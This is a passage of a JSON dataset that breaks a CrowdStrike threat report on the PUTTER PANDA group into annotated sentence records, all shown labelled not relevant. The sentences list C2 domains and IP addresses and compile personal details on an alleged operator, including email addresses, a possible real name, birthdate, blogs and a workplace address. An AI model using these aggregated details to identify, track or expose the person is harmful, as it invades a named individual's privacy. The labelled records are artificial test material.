null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p12-s70-143e32", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 12, "sentence_id": 70, "context_before": "Additionally, for a brief period in April domains have resolved to IP 2012, update8.firefoxupdata.com also resolved to address 100.42.216.230:\nthis IP address.", "sentence_text": "• news.decipherment.net\n• res.decipherment.net", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p12-s71-deec32", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 12, "sentence_id": 71, "context_before": "• news.decipherment.net\n• res.decipherment.net", "sentence_text": "The use of the same IP address during the same time • spacenews.botanict.com suggests that there is perhaps some cooperation or • spot.decipherment.net shared resources between COMMENT PANDA and PUTTER PANDA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p12-s72-bd38b2", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 12, "sentence_id": 72, "context_before": "The use of the same IP address during the same time • spacenews.botanict.com suggests that there is perhaps some cooperation or • spot.decipherment.net shared resources between COMMENT PANDA and PUTTER PANDA.", "sentence_text": "Additionally, several subdomains of ujheadph.com resolved to this IP:\nVIXEN PANDA\n• chs.ujheadph.com", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p12-s73-9aa0da", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 12, "sentence_id": 73, "context_before": "Additionally, several subdomains of ujheadph.com resolved to this IP:\nVIXEN PANDA\n• chs.ujheadph.com", "sentence_text": "Although not as conclusive as the • imageone.ujheadph.com links to COMMENT PANDA, IP address • img.ujheadph.com 31.170.110.163 was associated • klcg.ujheadph.com with VIXEN PANDA domain blog.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p12-s74-a4f3e5", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 12, "sentence_id": 74, "context_before": "Although not as conclusive as the • imageone.ujheadph.com links to COMMENT PANDA, IP address • img.ujheadph.com 31.170.110.163 was associated • klcg.ujheadph.com with VIXEN PANDA domain blog.", "sentence_text": "• naimap.ujheadph.com\nstrancorproduct.info from November to December • neo.ujheadph.com 2013.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p12-s75-10eeca", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 12, "sentence_id": 75, "context_before": "• naimap.ujheadph.com\nstrancorproduct.info from November to December • neo.ujheadph.com 2013.", "sentence_text": "In February 2014, this IP address was also • newspace.ujheadph.com associated with PUTTER PANDA domain ske.hfmforum.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p12-s76-7769e2", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 12, "sentence_id": 76, "context_before": "In February 2014, this IP address was also • newspace.ujheadph.com associated with PUTTER PANDA domain ske.hfmforum.", "sentence_text": "• pasco.ujheadph.com\ncom.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p12-s77-bb4882", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 12, "sentence_id": 77, "context_before": "• pasco.ujheadph.com\ncom.", "sentence_text": "While not directly overlapping, this potential infrastructure link is interesting, as VIXEN PANDA has Another subdomain of ujheadph.com has been previously displayed TTPs similar to COMMENT PANDA observed2 in connection with distinctive traffic (other CrowdStrike reporting describes VIXEN PANDA originating from the 3PARA RAT (described below), malware that extracts C2 commands embedded making it probable that this domain is between delimiters in web content), and has also associated with PUTTER PANDA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p12-s78-faad18", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 12, "sentence_id": 78, "context_before": "While not directly overlapping, this potential infrastructure link is interesting, as VIXEN PANDA has Another subdomain of ujheadph.com has been previously displayed TTPs similar to COMMENT PANDA observed2 in connection with distinctive traffic (other CrowdStrike reporting describes VIXEN PANDA originating from the 3PARA RAT (described below), malware that extracts C2 commands embedded making it probable that this domain is between delimiters in web content), and has also associated with PUTTER PANDA.", "sentence_text": "extensively targeted European entities.\n2See http://webcache.googleusercontent.com/search?q=cache:ZZyfzC1Y0UoJ:www.urlquery.net/report.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p12-s79-1ac671", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 12, "sentence_id": 79, "context_before": "extensively targeted European entities.\n2See http://webcache.googleusercontent.com/search?q=cache:ZZyfzC1Y0UoJ:www.urlquery.net/report.", "sentence_text": "php%3Fid%3D9771458+&cd=2&hl=en&ct=clnk&gl=uk", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p13-s80-532192", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 13, "sentence_id": 80, "context_before": "php%3Fid%3D9771458+&cd=2&hl=en&ct=clnk&gl=uk", "sentence_text": "“CPYY”\nSeveral email addresses have been associated with cpyy, who also appears to use the alternate handles cpiyy and cpyy.chen:\n• cpyy@sina.com\n• cpyy@hotmail.com\n• cpyy.chen@gmail.com\n• cpyy@cpyy.net\nThe cpyy.net domain lists “Chen Ping” as the registrant name, which may be cpyy’s real name, as this correlates with the initials “cp” in “cpyy”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p13-s81-9ff4c1", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 13, "sentence_id": 81, "context_before": "“CPYY”\nSeveral email addresses have been associated with cpyy, who also appears to use the alternate handles cpiyy and cpyy.chen:\n• cpyy@sina.com\n• cpyy@hotmail.com\n• cpyy.chen@gmail.com\n• cpyy@cpyy.net\nThe cpyy.net domain lists “Chen Ping” as the registrant name, which may be cpyy’s real name, as this correlates with the initials “cp” in “cpyy”.", "sentence_text": "A personal blog for cpyy was found at http://cpiyy.blog.163.com/.\nThe profile on this blog (shown in Figure 2 below) indicates that the user is male, was born on 25 May 1979, and works for the “military/police” (其他- 军人/警察).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p13-s82-e45efa", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 13, "sentence_id": 82, "context_before": "A personal blog for cpyy was found at http://cpiyy.blog.163.com/.\nThe profile on this blog (shown in Figure 2 below) indicates that the user is male, was born on 25 May 1979, and works for the “military/police” (其他- 军人/警察).", "sentence_text": "Personal Blog on 163.com", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p14-s83-0538b5", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 14, "sentence_id": 83, "context_before": "Personal Blog on 163.com", "sentence_text": "“CPYY” (cont’d)\nThis blog contains two postings in the “IT” category that indicate at least a passing interest in the topics of networking and programming.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p14-s84-3fe7c3", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 14, "sentence_id": 84, "context_before": "“CPYY” (cont’d)\nThis blog contains two postings in the “IT” category that indicate at least a passing interest in the topics of networking and programming.", "sentence_text": "A related CSDN profile for user cpiyy indicates that cpyy was working on or studying these topics in 2002 and 20033.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p14-s85-b10e17", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 14, "sentence_id": 85, "context_before": "A related CSDN profile for user cpiyy indicates that cpyy was working on or studying these topics in 2002 and 20033.", "sentence_text": "Another personal blog for cpyy (http://www.tianya.cn/1569234/bbs) appears to have last been updated in 2007.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p14-s86-d8975d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 14, "sentence_id": 86, "context_before": "Another personal blog for cpyy (http://www.tianya.cn/1569234/bbs) appears to have last been updated in 2007.", "sentence_text": "This states that the user lives in Shanghai, and has a birthdate identical to that in the 163.com blog.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p14-s87-4f9c35", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 14, "sentence_id": 87, "context_before": "This states that the user lives in Shanghai, and has a birthdate identical to that in the 163.com blog.", "sentence_text": "Personal Blog on tianya.cn 3See postings: http://bbs.csdn.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p14-s88-b2aa9a", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 14, "sentence_id": 88, "context_before": "Personal Blog on tianya.cn 3See postings: http://bbs.csdn.", "sentence_text": "net/users/cpiyy/topics\n4hxxp://www.xcar.com.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p14-s89-d27034", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 14, "sentence_id": 89, "context_before": "net/users/cpiyy/topics\n4hxxp://www.xcar.com.", "sentence_text": "cn/bbs/viewthread.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p14-s90-d967db", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 14, "sentence_id": 90, "context_before": "cn/bbs/viewthread.", "sentence_text": "php?tid=7635725&page=6", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p15-s91-5a1de1", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 15, "sentence_id": 91, "context_before": "php?tid=7635725&page=6", "sentence_text": "“CPYY” (cont’d)\nOn the XCar forum, cpyy.chen used a subforum called POLO (hacker slang for “Volkswagen cars”)\nto communicate with other users Linxder, peggycat, “Naturally do not understand romance” (天生不懂浪漫), “a wolf” (一只大灰狼), “large tile” (大瓦片), “winter” ( 冬夜), “chunni” (春妮), papaya, kukuhaha, Cranbing, “dusty sub” (多尘子), z11829, “ice star harbor” (冰星港), “polytechnic Aberdeen” (理工仔), “I love pineapple pie” (我爱菠罗派), and “she’s distant” in 2007.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p15-s92-27028e", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 15, "sentence_id": 92, "context_before": "“CPYY” (cont’d)\nOn the XCar forum, cpyy.chen used a subforum called POLO (hacker slang for “Volkswagen cars”)\nto communicate with other users Linxder, peggycat, “Naturally do not understand romance” (天生不懂浪漫), “a wolf” (一只大灰狼), “large tile” (大瓦片), “winter” ( 冬夜), “chunni” (春妮), papaya, kukuhaha, Cranbing, “dusty sub” (多尘子), z11829, “ice star harbor” (冰星港), “polytechnic Aberdeen” (理工仔), “I love pineapple pie” (我爱菠罗派), and “she’s distant” in 2007.", "sentence_text": "This could be a hacker slang word, but it is unclear as to the definition.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p15-s93-8cd29a", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 15, "sentence_id": 93, "context_before": "This could be a hacker slang word, but it is unclear as to the definition.", "sentence_text": "The conversation alludes to Linxder being the “teacher” or “landlord” and the other aforementioned users are his “students”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p15-s94-69ad52", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 15, "sentence_id": 94, "context_before": "The conversation alludes to Linxder being the “teacher” or “landlord” and the other aforementioned users are his “students”.", "sentence_text": "Linxder references how he has “found jobs” for them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p15-s95-68d149", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 15, "sentence_id": 95, "context_before": "Linxder references how he has “found jobs” for them.", "sentence_text": "It is possible that this is a reference to hacking jobs wrapped up in car metaphors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p15-s96-0e000a", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 15, "sentence_id": 96, "context_before": "It is possible that this is a reference to hacking jobs wrapped up in car metaphors.", "sentence_text": "Linxder is the handle of an actor associated with the likely Shanghai-based COMMENT PANDA group5 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p15-s97-4ce964", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 15, "sentence_id": 97, "context_before": "Linxder is the handle of an actor associated with the likely Shanghai-based COMMENT PANDA group5 .", "sentence_text": "cpyy also appears to have a keen interest in photography; his 163.com blog includes several photographs taken by cpyy in the blog postings and albums section.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p15-s98-6890c8", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 15, "sentence_id": 98, "context_before": "cpyy also appears to have a keen interest in photography; his 163.com blog includes several photographs taken by cpyy in the blog postings and albums section.", "sentence_text": "Some of these photographs also appear in a Picasa site7 (examples are shown in Figures 5 and 6) from 2005, 2006, belonging to a user cpyy.chen.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p16-s101-d3cc4d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 16, "sentence_id": 101, "context_before": "“CPYY” (cont’d)", "sentence_text": "An account on rootkit.com, a popular low-level software security site, existed for user cpyy and was accessed in at least May 2004.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p16-s102-32f459", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 16, "sentence_id": 102, "context_before": "An account on rootkit.com, a popular low-level software security site, existed for user cpyy and was accessed in at least May 2004.", "sentence_text": "This account was registered with primary email address cpyy@cpyy.net and backup email address cpyy@hotmail.com; it listed a date of birth as 24 May 1979, consistent with cpyy’s other profiles.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p16-s103-d6d304", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 16, "sentence_id": 103, "context_before": "This account was registered with primary email address cpyy@cpyy.net and backup email address cpyy@hotmail.com; it listed a date of birth as 24 May 1979, consistent with cpyy’s other profiles.", "sentence_text": "The IP address 218.242.252.214 was associated with this account; it is owned by the Oriental Cable Network Co., Ltd., an ISP located in Shanghai.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p16-s104-6349a2", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 16, "sentence_id": 104, "context_before": "The IP address 218.242.252.214 was associated with this account; it is owned by the Oriental Cable Network Co., Ltd., an ISP located in Shanghai.", "sentence_text": "Registration on this forum shows that cpyy had an interest in security-related programming topics, which is backed up by the postings on his personal blog and CSDN account.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p16-s105-c8d911", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 16, "sentence_id": 105, "context_before": "Registration on this forum shows that cpyy had an interest in security-related programming topics, which is backed up by the postings on his personal blog and CSDN account.", "sentence_text": "Photograph from\n163.com Blog\nPhotograph from\ncpyy.chen’s\nPicasa Albums", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p17-s106-d63af9", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 17, "sentence_id": 106, "context_before": "Photograph from\n163.com Blog\nPhotograph from\ncpyy.chen’s\nPicasa Albums", "sentence_text": "“CPYY” (cont’d)\n711 Network Security Team One of the sites registered to cpyy was used to host a web-based email service, along with a forum on www.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p17-s108-27a758", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 17, "sentence_id": 108, "context_before": "cpyy.net.", "sentence_text": "One of these articles, entitled “IMD-based packet filtering firewall to achieve the principles”9, is apparently authored by xiaobai, with email address xiaobai@openfind.com.cn; it was published on the “GRATEFUL” (饮水思源) security digest list10 that is hosted by Shanghai Jiao Tong University (SJTU).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p17-s109-d5bc9a", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 17, "sentence_id": 109, "context_before": "One of these articles, entitled “IMD-based packet filtering firewall to achieve the principles”9, is apparently authored by xiaobai, with email address xiaobai@openfind.com.cn; it was published on the “GRATEFUL” (饮水思源) security digest list10 that is hosted by Shanghai Jiao Tong University (SJTU).", "sentence_text": "This Tipper also indicates that “the Chinese Communist Party (CCP)\nand the People’s Liberation Army (PLA) aggressively target SJTU and its School of Information Security Engineering (SISE) as a source of research and student recruitment to conduct network offense and defense campaigns”, so it is possible that the Posting on SJTU attention of the Chinese state via this institution.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p17-s110-926291", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 17, "sentence_id": 110, "context_before": "This Tipper also indicates that “the Chinese Communist Party (CCP)\nand the People’s Liberation Army (PLA) aggressively target SJTU and its School of Information Security Engineering (SISE) as a source of research and student recruitment to conduct network offense and defense campaigns”, so it is possible that the Posting on SJTU attention of the Chinese state via this institution.", "sentence_text": "“GRATEFUL” BBS An additional connection to SJTU comes from a C2 domain, checalla.com, used with the 4H RAT in 2008.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p17-s111-efefe5", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 17, "sentence_id": 111, "context_before": "“GRATEFUL” BBS An additional connection to SJTU comes from a C2 domain, checalla.com, used with the 4H RAT in 2008.", "sentence_text": "This domain was registered to httpchen@gmail.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p17-s112-5edefc", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 17, "sentence_id": 112, "context_before": "This domain was registered to httpchen@gmail.", "sentence_text": "com at the time, and this address was also used to make a posting on the GRATEFUL BBS (shown in Figure 7).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p17-s113-720e42", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 17, "sentence_id": 113, "context_before": "com at the time, and this address was also used to make a posting on the GRATEFUL BBS (shown in Figure 7).", "sentence_text": "The posting indicates that httpchen is located at the 闵行 (Minhang) campus of SJTU and was posting using IP address 58.196.156.15, which is associated with the China Education and Research Network (CERNET), a nationwide network managed by the Chinese Ministry of Education.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p17-s114-8816b9", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 17, "sentence_id": 114, "context_before": "The posting indicates that httpchen is located at the 闵行 (Minhang) campus of SJTU and was posting using IP address 58.196.156.15, which is associated with the China Education and Research Network (CERNET), a nationwide network managed by the Chinese Ministry of Education.", "sentence_text": "It also states that httpchen is studying at the school of Information Security Engineering within SJTU.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p17-s115-b2791d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 17, "sentence_id": 115, "context_before": "It also states that httpchen is studying at the school of Information Security Engineering within SJTU.", "sentence_text": "8For example, hxxp://www.xfocus.net/articles/200307/568.html", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p17-s116-e1e9bb", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 17, "sentence_id": 116, "context_before": "8For example, hxxp://www.xfocus.net/articles/200307/568.html", "sentence_text": "9This article also lists http://cpyy.vicp.net/ as the original source site, although no archived content could be recovered for this.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p17-s117-e82e0a", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 17, "sentence_id": 117, "context_before": "9This article also lists http://cpyy.vicp.net/ as the original source site, although no archived content could be recovered for this.", "sentence_text": "10See http://bbs.sjtu.edu.cn/bbsanc,path,/groups/GROUP_3/Security/D44039356/D69C6D2AC/D4C11F438/D6DB67E4E/DA69FF663/\nM.1052844461.A.html", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p18-s118-1a3c98", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 18, "sentence_id": 118, "context_before": "10See http://bbs.sjtu.edu.cn/bbsanc,path,/groups/GROUP_3/Security/D44039356/D69C6D2AC/D4C11F438/D6DB67E4E/DA69FF663/\nM.1052844461.A.html", "sentence_text": "A picture from the 中学时代 (“high school”) album posted in February 2007 shows a male – likely cpyy based on the clothing shown in the second picture, which matches the pictures of cpyy shown above – performing exercise in front of a group of likely soldiers and an officer:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p19-s119-10b9f0", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 19, "sentence_id": 119, "context_before": "A picture from the 中学时代 (“high school”) album posted in February 2007 shows a male – likely cpyy based on the clothing shown in the second picture, which matches the pictures of cpyy shown above – performing exercise in front of a group of likely soldiers and an officer:", "sentence_text": "A shot of probably cpyy’s dormitory room shows in the background two military hats that appear to be Type 07 PLA Army officer peak hats:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p20-s120-8c786f", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 20, "sentence_id": 120, "context_before": "A shot of probably cpyy’s dormitory room shows in the background two military hats that appear to be Type 07 PLA Army officer peak hats:", "sentence_text": "This album also contains a shot of the exterior of a building with several large satellite dishes outside:\nThis same building and the satellite dishes also appear in the “office” album.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p20-s121-f15b0b", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 20, "sentence_id": 121, "context_before": "This album also contains a shot of the exterior of a building with several large satellite dishes outside:\nThis same building and the satellite dishes also appear in the “office” album.", "sentence_text": "The reflection effects observed on the windows of this building could be due to coatings applied to resist eavesdropping via laser microphones and to increase privacy, which would be consistent with a military installation conducting sensitive work.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p21-s122-ad7a60", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 21, "sentence_id": 122, "context_before": "The reflection effects observed on the windows of this building could be due to coatings applied to resist eavesdropping via laser microphones and to increase privacy, which would be consistent with a military installation conducting sensitive work.", "sentence_text": "As mentioned above, checalla.com was used for command and control with the PUTTER PANDA 4H RAT in 2008.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p21-s123-adf62c", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 21, "sentence_id": 123, "context_before": "As mentioned above, checalla.com was used for command and control with the PUTTER PANDA 4H RAT in 2008.", "sentence_text": "This domain was registered to httpchen@gmail.com, and in May 2009 the domain registration details were updated to include a Registrant Address of “shanghai yuexiulu 46 45 202#”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p21-s124-ae1e99", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 21, "sentence_id": 124, "context_before": "This domain was registered to httpchen@gmail.com, and in May 2009 the domain registration details were updated to include a Registrant Address of “shanghai yuexiulu 46 45 202#”.", "sentence_text": "A search for this location reveals an area of Shanghai shown in Figure 812 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p21-s125-24a610", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 21, "sentence_id": 125, "context_before": "A search for this location reveals an area of Shanghai shown in Figure 812 .", "sentence_text": "several satellite dishes within green areas, sports courts and a large office building.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p21-s126-0a6b35", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 21, "sentence_id": 126, "context_before": "several satellite dishes within green areas, sports courts and a large office building.", "sentence_text": "12Source: https://www.google.com/maps/place/31%C2%B017’18.0%22N+121%C2%B027’18.7%22E/@31.2882939,121.4554673,658m/\ndata=!3m1!1e3!4m2!3m1!1s0x0:0x0", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p22-s127-3d7942", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 22, "sentence_id": 127, "context_before": "12Source: https://www.google.com/maps/place/31%C2%B017’18.0%22N+121%C2%B027’18.7%22E/@31.2882939,121.4554673,658m/\ndata=!3m1!1e3!4m2!3m1!1s0x0:0x0", "sentence_text": "Satellite Views of Area of Interest in Shanghai Section within Area of Interest", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p23-s128-e3de34", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 23, "sentence_id": 128, "context_before": "Satellite Views of Area of Interest in Shanghai Section within Area of Interest", "sentence_text": "This image is exceptionally similar to building shown in cpyy’s “office” album (see Figure 11 below).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p23-s129-9b144b", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 23, "sentence_id": 129, "context_before": "This image is exceptionally similar to building shown in cpyy’s “office” album (see Figure 11 below).", "sentence_text": "13http://www.panoramio.com/user/3305909\n14Alternately Romanized as Zhabei", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p24-s131-d84e7d", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 24, "sentence_id": 131, "context_before": "(left) and cpyy Images", "sentence_text": "Compared According to a public report15 on the Chinese PLA’s General Staff Department (GSD), the 12th Bureau of the 3rd GSD is headquartered in the Zhabei district of Shanghai and “appears to have a functional mission involving satellites, likely inclusive of intercept of satellite communications and possibly space-based SIGINT collection”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p24-s132-8cfdcd", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 24, "sentence_id": 132, "context_before": "Compared According to a public report15 on the Chinese PLA’s General Staff Department (GSD), the 12th Bureau of the 3rd GSD is headquartered in the Zhabei district of Shanghai and “appears to have a functional mission involving satellites, likely inclusive of intercept of satellite communications and possibly space-based SIGINT collection”.", "sentence_text": "The same report also lists a Military Unit Cover Designator (MUCD) of 61486 for this bureau.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p24-s134-bf4a83", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 24, "sentence_id": 134, "context_before": "A webpage16 published on a Chinese government site detailing theatrical performances involving members of the PLA lists an address of “闸北区粤秀路46号” (46 Yue Xiu Road, Zhabei District) for “总参61486部队” (61486 Forces General Staff).", "sentence_text": "A search for this location shows an identical area to that shown in Figure 8.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-47_crowdstrike_report-p24-s135-5ab3e8", "source": "crowdstrike", "doc_id": "47_crowdstrike_report", "page_number": 24, "sentence_id": 135, "context_before": "A search for this location shows an identical area to that shown in Figure 8.", "sentence_text": "This unit’s suspected involvement in “space surveillance”17 and “intercept of satellite communications” fits with their observed targeting preferences for Western companies producing technologies in the space and imaging/remote sensing sectors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 